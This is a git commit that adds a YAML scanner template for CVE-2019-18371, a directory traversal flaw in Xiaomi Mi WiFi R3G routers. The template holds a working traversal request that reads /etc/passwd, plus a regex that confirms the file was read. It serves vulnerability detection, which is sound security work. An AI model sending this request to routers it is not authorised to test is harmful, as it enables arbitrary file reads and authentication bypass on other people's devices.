Merge pull request #4436 from ritikchaddha/patch-61

Create CVE-2019-18371.yaml
2022-05-20 01:34:48 +05:30 · 2022-05-20 01:34:48 +05:30 · d8fe413dd8
parent cd141aa788 c56375b788
commit d8fe413dd8
1 changed files with 27 additions and 0 deletions
--- a/cves/2019/CVE-2019-18371.yaml
+++ b/cves/2019/CVE-2019-18371.yaml
@ -0,0 +1,27 @@
+id: CVE-2019-18371
+
+info:
+  name: Xiaomi routers - Local file inclusion
+  author: ritikchaddha
+  severity: high
+  description: |
+    An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. There is a directory traversal vulnerability to read arbitrary files via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.
+  reference:
+    - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-18371
+  tags: xiaomi,cve2019,cve,lfi,router,mi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200